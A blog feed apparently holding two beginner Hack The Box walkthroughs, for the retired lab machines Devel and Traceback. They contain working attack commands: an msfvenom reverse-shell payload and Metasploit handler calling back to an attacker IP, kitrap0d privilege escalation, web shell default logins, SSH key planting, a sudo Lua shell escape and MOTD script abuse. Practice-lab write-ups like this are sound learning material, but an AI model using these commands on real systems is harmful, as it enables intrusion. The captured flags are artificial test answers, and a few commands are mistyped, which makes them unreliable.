DEV Community: Josh Kerr

Hack The Box write up for Devel

Josh Kerr — Mon, 24 Aug 2020 21:17:38 +0000

I've been doing some ethical hacking lately. This is my first writeup for one of the computers I hacked into (legally.) The machine I compromised is called Devel on Hackthebox.eu. I'm a beginner when it comes to ethical hacking, so please excuse my mistakes.

Overall this box was fun. It allowed me to get more experience using metasploit which is really powerful. I'm totally a script kiddy with this tool.

Nmap scan

Let's get started with an nmap scan.

Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-21 11:26 CDT
Nmap scan report for devel.htb (10.10.10.5)
Host is up (0.074s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17 02:06AM <DIR> aspnet_client
| 03-17-17 05:37PM 689 iisstart.htm
|_03-17-17 05:37PM 184946 welcome.png
| ftp-syst: 
|_ SYST: Windows_NT
80/tcp open http Microsoft IIS httpd 7.5
| http-methods: 
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.29 seconds

The scan shows that we've got an FTP server and a Web server running on a Windows box. Let's see what the website shows:

Looks like we've got IIS version 7 with the default page. Let's see if we can login to the FTP server with anonymous.

Anonymous login worked just fine. Looks like there are some files in there including what seems to be the IIS start page. Could this be the web directory?

Let's see if we can upload a file to that directory:

Yes! Okay, now let's use msfvenom to create a page that we can exploit to get a reverse shell. I googled this to find the details.

The first link gave me what I needed. Make sure to replace LHOST with the IP of your machine.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.26 LPORT=1234 -f aspx -o shell.aspx

Now we've got a script to upload via ftp to the website. This should give us a reverse shell. First let's fire up metasploit so that we can capture the reverse shell.

You'll want to use the following:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 10.10.14.26
set LPORT 1234
exploit

Make sure to change the LHOST to point to your machine on the VPN.

That should get you a shell on the box.

Running getuid shows that we are IIS APPOOL\Web user. We want root so there is more work to do.

Let's go into the shell and use systeminfo to see if we can find some exploits.

Now we need to exit the shell, background the meterpreter session and do some exploit research.

exit
background
use post/multi/recon/local_exploit_suggester
set session 1
run

If you did that correctly you should see a list of expoits we can use. I had to google to see which one of these would be best. The recommendation was to use the kitrap0d, the second on the list.

use exploit/windows/local/ms10_015_kitrap0d
show options

We need to tell the module which session to run on, our local host ip and our local host port.

set sessions 1
set LHOST 10.10.14.26
set LPORT 1234
run

I goofed at first and left out the session. I added it and the exploit worked.

If you did everything correctly you should be back at a meterpreter prompt. If you run whoami you should see:

Great, we own this box. Go grab the user.txt and root.txt. I initially had some trouble remembering which windows commands to use. I eventually figured it out.

User flag is:

9ecdd6a3aedf24b41562fea70f4cb3e8

Root flag is:

e621a0b5041708797c4fc4728bc72b4b

This box was fairly easy. Metasploit makes it pretty easy to find exploits. Figuring out which module and options is the hardest part. Google is your friend here. There are a lot of walkthroughs on this box you can use for additional help too.

This box was a lot of fun. I'd recommend it to beginners like me.

Hack The Box write up for Traceback

Josh Kerr — Mon, 24 Aug 2020 21:13:18 +0000

This article is my guide for hacking traceback, one of the retired machines at HackTheBox.eu. This is my first hacking guide, so hopefully i'm doing this correctly.

I enjoyed this box. It was right at my skill level and took me about two hours to complete.

For ethical hacking, I'm using Parrot Security Linux running in a VM.

To start, instead of using the target box's IP address, I created an /etc/hosts entry for it called traceback.htb. This change makes things a lot easier because I don't need to remember the IP address of the box.

sudo echo "10.10.10.181 >> /etc/hosts

Nmap initial scan

nmap -A traceback.htb

Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-20 14:43 CDT
Nmap scan report for traceback.htb (10.10.10.181)
Host is up (0.061s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
| 2048 96:25:51:8e:6c:83:07:48:ce:11:4b:1f:e5:6d:8a:28 (RSA)
| 256 54:bd:46:71:14:bd:b2:42:a1:b6:b0:2d:94:14:3b:0d (ECDSA)
|_ 256 4d:c3:f8:52:b8:85:ec:9c:3e:4d:57:2c:4a:82:fd:86 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Help us
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.38 seconds

Pretty simple scan. It looks like web and ssh are available.

Web site looks like this:

Viewing source on the website reveals this:

Hmm...

I decided to search google for that string:

It looks like we got a hit. I'm going to see if any of those shells are installed on this server, time for gobuster.

I took that list of shells from GitHub and dumped them into a text file called shells.txt. Let's see if we can find them on the server:

Now let's fire up gobuster:

We got a hit!

I loaded the page into the browser:

http://traceback.htb/smevk.php

And this came up:

Looking at the source code of the original on GitHub, I can see a default login embedded in code.

Username: admin
Password: admin

Let's try those.

...we are in. It looks like the current user is webadmin. After browsing around in the webadmin folder, I noticed that the /home/webadmin/.ssh folder is writable. We can upload an authorized_keys file with our key in it to gain access via ssh. Gaining ssh will be very helpful.

First, let's generate an ssh key:

ssh-keygen

Now let's copy the public key to authorized_keys:

cp traceback.pub authorized_keys

Now let's upload it via the form on the website:

Great, it took it. Now let's chmod the private key so we can use it.

chmod 600 traceback

Now let's ssh into the box:

ssh -I traceback webadmin@traceback.htb

We are in!

Let's see if there are any programs we can run as root:

sudo -l

Oh, this looks promising. I google luvit and found this:

Luvit looks like a Lua application. I went to gtfobins to see if I could exploit a Lua application.

And here is our strategy. First, I executed:

sudo -u sysadmin /home/sysadmin/luvit

The application prompted me to enter something. I typed in the command I got from gtfobins but used bash instead of sh:

os.execute("/bin/bash -i")

Now I've got access to sysadmin and the first flag!

11dadca21fe54bc8d753f61fc7a47ada

Now let's see if we can get root.

I downloaded linpeas.sh from here.

wget https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh

I tried to get it directly on the box, but that didn't work.

I'm going to download it to my local box and use python's built-in http server to upload it. I'm executing this in the same folder that linpeas.sh is in.

python -m SimpleHTTPServer

Now I can access it from the remote by calling:

wget http://10.10.14.26:8000/linpeas.sh

Let's make it executable:

chmod +x linpeas.sh

Now let's run linpeas.sh

./linpeas.sh

Scrolling through the output, I noticed this:

00-header seems to be the header message when you log in:

I decided to see if I could run "id" from that shell when I log in as webadmin. The command would tell me what priv's are being executed when that script is run.

echo "id" >> /etc/update-motd.d/00-header

When I log in, it should print out what user is executing that file. Hopefully root.

Boom root! Ok, let's exploit that. We know that the root flag is always /root/root.txt.

echo "cat /root/root.txt" >> /etc/update-motd.d/00-header

Now let's log in again.

And you can see the root flag printed:

b2a2c50f8f2c0d1acb6c0aaf090712c9

We are all done! We could've easily used that exploit to gain actual root on the box, but all I needed for this activity was the root flag. This box was fun! I highly recommend it.